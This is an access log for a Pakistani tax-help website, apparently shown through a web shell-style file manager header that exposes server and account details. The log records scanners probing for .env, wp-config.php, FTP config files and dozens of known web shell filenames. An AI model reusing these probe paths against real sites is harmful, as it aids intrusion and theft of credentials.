| Server IP : 68.65.120.201 / Your IP : 216.73.216.29 Web Server : LiteSpeed System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : taxhyuvu ( 2294) PHP Version : 8.1.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /proc/thread-self/root/proc/self/root/home/taxhyuvu/access-logs/ |
Upload File : |
180.242.130.27 - - [20/Dec/2025:07:12:59 -0500] "GET /wp-content/plugins/wps-hide-login/wps-hide-login.php HTTP/1.1" 301 795 "-" "Mozilla/5.0" 49.235.136.28 - - [20/Dec/2025:07:15:57 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 62.60.131.162 - - [20/Dec/2025:07:25:14 -0500] "GET / HTTP/1.1" 301 795 "-" "Go-http-client/1.1" 62.60.131.162 - - [20/Dec/2025:07:25:14 -0500] "GET / HTTP/1.1" 301 795 "-" "Go-http-client/1.1" 52.167.144.166 - - [20/Dec/2025:07:37:36 -0500] "GET /viewjudgment?id=218 HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 216.244.66.236 - - [20/Dec/2025:07:22:46 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 34.13.174.123 - - [20/Dec/2025:07:45:54 -0500] "GET /index HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" 124.156.157.91 - - [20/Dec/2025:07:53:12 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 172.209.209.33 - - [20/Dec/2025:07:54:29 -0500] "GET /.env HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 172.209.209.33 - - [20/Dec/2025:07:54:34 -0500] "POST / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 216.244.66.236 - - [20/Dec/2025:08:07:00 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 66.249.75.234 - - [20/Dec/2025:08:12:22 -0500] "GET / HTTP/1.1" 301 795 "-" "GoogleOther" 52.167.144.25 - - [20/Dec/2025:08:08:55 -0500] "GET /news_detaill?id=26 HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 216.244.66.203 - - [20/Dec/2025:08:28:01 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 167.172.128.241 - - [20/Dec/2025:08:26:01 -0500] "GET /admin/imger/weizen-6050574.webp HTTP/1.1" 301 795 "http://taxhelplines.com.pk/admin/imger/weizen-6050574.webp" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 54.160.82.21 - - [20/Dec/2025:08:41:17 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36" 216.244.66.236 - - [20/Dec/2025:08:50:07 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 43.155.162.41 - - [20/Dec/2025:08:39:06 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 173.252.95.4 - - [20/Dec/2025:09:30:18 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 216.244.66.236 - - [20/Dec/2025:09:34:31 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 173.252.95.2 - - [20/Dec/2025:09:30:18 -0500] "GET / HTTP/1.1" 301 795 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 216.244.66.236 - - [20/Dec/2025:09:34:31 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 66.249.75.234 - - [20/Dec/2025:09:34:32 -0500] "GET /ads.txt HTTP/1.1" 301 795 "-" "Google-adstxt" 159.223.178.180 - - [20/Dec/2025:09:36:27 -0500] "GET /admin/imger/trade-talks1-696x379(1).png HTTP/1.1" 301 795 "http://www.taxhelplines.com.pk/admin/imger/trade-talks1-696x379(1).png" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 34.138.14.113 - - [20/Dec/2025:09:53:55 -0500] "GET /robots.txt HTTP/1.0" 301 795 "-" "ZoominfoBot (zoominfobot at zoominfo dot com)" 198.235.24.20 - - [20/Dec/2025:09:42:24 -0500] "GET / HTTP/1.1" 301 795 "-" "-" 34.138.14.113 - - [20/Dec/2025:09:53:55 -0500] "GET / HTTP/1.0" 301 795 "-" "ZoominfoBot (zoominfobot at zoominfo dot com)" 158.94.208.149 - - [20/Dec/2025:09:58:06 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.38.22.4 - - [20/Dec/2025:09:58:12 -0500] "GET /components/com_jbusinessdirectory/assets/upload.php HTTP/1.1" 301 795 "-" "ALittle Client" 216.244.66.244 - - [20/Dec/2025:10:01:42 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 43.156.26.88 - - [20/Dec/2025:10:28:14 -0500] "HEAD /.vscode/sftp.json HTTP/1.1" 301 0 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36" 43.156.26.88 - - [20/Dec/2025:10:28:15 -0500] "HEAD /.ftpconfig HTTP/1.1" 301 0 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36" 199.244.88.219 - - [20/Dec/2025:10:40:03 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" 43.134.186.61 - - [20/Dec/2025:10:40:38 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 216.244.66.244 - - [20/Dec/2025:10:46:16 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 34.138.14.113 - - [20/Dec/2025:10:54:48 -0500] "GET /robots.txt HTTP/1.0" 301 795 "-" "ZoominfoBot (zoominfobot at zoominfo dot com)" 34.138.14.113 - - [20/Dec/2025:10:54:49 -0500] "GET / HTTP/1.0" 301 795 "-" "ZoominfoBot (zoominfobot at zoominfo dot com)" 178.128.154.214 - - [20/Dec/2025:10:55:18 -0500] "GET /admin/imger/fbr.tax_-696x522.jpg HTTP/1.1" 301 795 "http://taxhelplines.com.pk/admin/imger/fbr.tax_-696x522.jpg" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 170.106.72.178 - - [20/Dec/2025:11:06:28 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 43.157.95.239 - - [20/Dec/2025:11:15:45 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 43.173.178.87 - - [20/Dec/2025:11:17:12 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" 47.128.111.208 - - [20/Dec/2025:11:20:54 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" 216.244.66.236 - - [20/Dec/2025:11:05:26 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 43.173.180.54 - - [20/Dec/2025:11:16:58 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.114 Safari/537.36" 216.244.66.203 - - [20/Dec/2025:11:28:05 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 2a06:98c0:3600::103 - - [20/Dec/2025:11:37:52 -0500] "GET /wp-admin/setup-config.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" 2a06:98c0:3600::103 - - [20/Dec/2025:11:38:02 -0500] "GET /wp-admin/setup-config.php HTTP/1.1" 301 795 "-" "http://customshelpline.com.pk/wp-admin/setup-config.php" 43.173.180.163 - - [20/Dec/2025:11:23:03 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.114 Safari/537.36" 2a06:98c0:3600::103 - - [20/Dec/2025:11:36:19 -0500] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" 2a06:98c0:3600::103 - - [20/Dec/2025:11:37:28 -0500] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 301 795 "-" "http://customhelpline.com.pk/wordpress/wp-admin/setup-config.php" 159.89.167.163 - - [20/Dec/2025:11:48:09 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36" 159.89.167.163 - - [20/Dec/2025:11:48:10 -0500] "GET /favicon.ico HTTP/1.1" 301 795 "http://incometaxhelpline.com.pk/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36" 62.60.131.162 - - [20/Dec/2025:11:50:05 -0500] "GET / HTTP/1.1" 301 795 "-" "Go-http-client/1.1" 205.210.31.177 - - [20/Dec/2025:11:53:17 -0500] "GET / HTTP/1.1" 301 795 "-" "-" 216.244.66.236 - - [20/Dec/2025:11:50:19 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.236 - - [20/Dec/2025:11:50:19 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 13.74.255.150 - - [20/Dec/2025:12:11:33 -0500] "GET /index4.php HTTP/1.1" 301 795 "-" "-" 13.74.255.150 - - [20/Dec/2025:12:11:33 -0500] "GET /panelx.php HTTP/1.1" 301 795 "-" "-" 13.74.255.150 - - [20/Dec/2025:12:11:35 -0500] "GET /rasp.php HTTP/1.1" 301 795 "-" "-" 13.74.255.150 - - [20/Dec/2025:12:11:36 -0500] "GET /router.php HTTP/1.1" 301 795 "-" "-" 195.24.236.147 - - [20/Dec/2025:12:10:56 -0500] "GET / HTTP/1.1" 301 795 "-" "-" 195.24.236.147 - - [20/Dec/2025:12:10:56 -0500] "GET / HTTP/1.1" 301 795 "-" "-" 13.74.255.150 - - [20/Dec/2025:12:11:31 -0500] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 795 "-" "-" 13.74.255.150 - - [20/Dec/2025:12:11:32 -0500] "GET /get.php HTTP/1.1" 301 795 "-" "-" 13.74.255.150 - - [20/Dec/2025:12:11:32 -0500] "GET /dhlshipments.php HTTP/1.1" 301 795 "-" "-" 13.74.255.150 - - [20/Dec/2025:12:11:34 -0500] "GET /bekle.php HTTP/1.1" 301 795 "-" "-" 13.74.255.150 - - [20/Dec/2025:12:11:34 -0500] "GET /auths.php HTTP/1.1" 301 795 "-" "-" 13.74.255.150 - - [20/Dec/2025:12:11:35 -0500] "GET /_inc-rasberry0342.php HTTP/1.1" 301 795 "-" "-" 13.74.255.150 - - [20/Dec/2025:12:11:36 -0500] "GET /wp-config.php HTTP/1.1" 301 795 "-" "-" 216.244.66.203 - - [20/Dec/2025:12:12:27 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 34.32.205.244 - - [20/Dec/2025:12:16:46 -0500] "GET /news_detaill HTTP/1.1" 301 795 "-" "YouViewHTML/1.0 AppleWebKit/605.1.15 (Sagemcom; RTIW387; RTIW387.002.P; CDS/0.14.128; API/4.0.0; PS/4.2.240) ( DVR HTML IPCMC UHD DASH DRM MSE),gzip(gfe),gzip(gfe)" 43.135.138.128 - - [20/Dec/2025:12:22:48 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 95.135.93.51 - - [20/Dec/2025:12:25:05 -0500] "GET http://taxhelplines.com.pk/salestaxon HTTP/1.1" 301 795 "http://taxhelplines.com.pk" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36" 216.244.66.236 - - [20/Dec/2025:12:35:02 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 4.194.209.56 - - [20/Dec/2025:12:39:16 -0500] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:18 -0500] "GET /shoha.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:20 -0500] "GET /an7.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:21 -0500] "GET /333.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:21 -0500] "GET /n.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:23 -0500] "GET /mds.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:24 -0500] "GET /admir.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:26 -0500] "GET /wp-admin/admin-post.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:28 -0500] "GET /gmo.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:29 -0500] "GET /alfa.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:31 -0500] "GET /123.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:32 -0500] "GET /lock360.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:33 -0500] "GET /wp-admin/css/colour.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:34 -0500] "GET /wp-x7.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:35 -0500] "GET /p.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:36 -0500] "GET /v3.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:38 -0500] "GET /ton.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:39 -0500] "GET /555.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:39 -0500] "GET /AxAo.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:40 -0500] "GET /wp-content/themes/sketch/404.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:41 -0500] "GET /nc.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:45 -0500] "GET /sto.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:46 -0500] "GET /ffile.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:48 -0500] "GET /wp1.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:48 -0500] "GET /css/up.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:50 -0500] "GET /666.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:51 -0500] "GET /wb.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:52 -0500] "GET /fs.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:53 -0500] "GET /0x.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:54 -0500] "GET /file.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:56 -0500] "GET /card.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:57 -0500] "GET /menu.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:57 -0500] "GET /mnkalo.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:59 -0500] "GET /031.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:01 -0500] "GET /mws.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:01 -0500] "GET /dlu.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:02 -0500] "GET /.well-known/acme-challenge/about.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:03 -0500] "GET /class19.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:03 -0500] "GET /wp-the1me.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:04 -0500] "GET /lala.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:07 -0500] "GET /1.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:08 -0500] "GET /gifclass.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:09 -0500] "GET /file9.php HTTP/1.1" 301 795 "-" "-" 216.244.66.236 - - [20/Dec/2025:12:35:02 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.236 - - [20/Dec/2025:12:35:02 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 40.77.167.35 - - [20/Dec/2025:12:35:02 -0500] "GET /viewreport?id=256 HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 207.46.13.230 - - [20/Dec/2025:12:35:03 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 4.194.209.56 - - [20/Dec/2025:12:39:19 -0500] "GET /raw.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:22 -0500] "GET /ahax.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:24 -0500] "GET /bless5.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:25 -0500] "GET /wp-admin/maint/wp-is.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:26 -0500] "GET /moon.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:27 -0500] "GET /wp-content/themes/admin.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:29 -0500] "GET /wp-admin/includes/xmrlpc.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:30 -0500] "GET /cong.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:31 -0500] "GET /num.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:34 -0500] "GET /NewFile.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:36 -0500] "GET /wp-includes/sodium_compat/index.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:37 -0500] "GET /system.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:41 -0500] "GET /db.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:42 -0500] "GET /file1.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:43 -0500] "GET /file32.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:43 -0500] "GET /hook.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:44 -0500] "GET /wp-includes/style-engine/index.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:45 -0500] "GET /file4.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:47 -0500] "GET /403.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:49 -0500] "GET /aa.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:51 -0500] "GET /chosen.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:54 -0500] "GET /bless11.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:55 -0500] "GET /indo.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:58 -0500] "GET /222.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:39:59 -0500] "GET /file3.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:05 -0500] "GET /k.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:06 -0500] "GET /admin.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:07 -0500] "GET /css.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:11 -0500] "GET /wp.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:13 -0500] "GET /owl.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:13 -0500] "GET /mo.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:14 -0500] "GET /file21.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:18 -0500] "GET /info.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:19 -0500] "GET /radio.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:19 -0500] "GET /404.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:20 -0500] "GET /wp-admin/js/wp-conflg.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:09 -0500] "GET /hk.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:10 -0500] "GET /yas.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:12 -0500] "GET /wp-gr.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:15 -0500] "GET /ok.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:15 -0500] "GET /444.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:16 -0500] "GET /zc-903.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:17 -0500] "GET /cc.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:17 -0500] "GET /nij.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:21 -0500] "GET /tox.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:21 -0500] "GET /lo.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:22 -0500] "GET /wpls.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:23 -0500] "GET /geck.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:24 -0500] "GET /777.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:26 -0500] "GET /2.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:26 -0500] "GET /zxin.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:27 -0500] "GET /xtt.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:30 -0500] "GET /shellalfa.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:33 -0500] "GET /jp.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:34 -0500] "GET /fe5.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:38 -0500] "GET /wp-update.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:40 -0500] "GET /class-t.api.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:41 -0500] "GET /000.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:41 -0500] "GET /classwithtostring.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:43 -0500] "GET /file18.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - [20/Dec/2025:12:40:52 -0500] "GET /33.php HTTP/1.1" 301 795 "-" "-" 4.194.209.56 - - 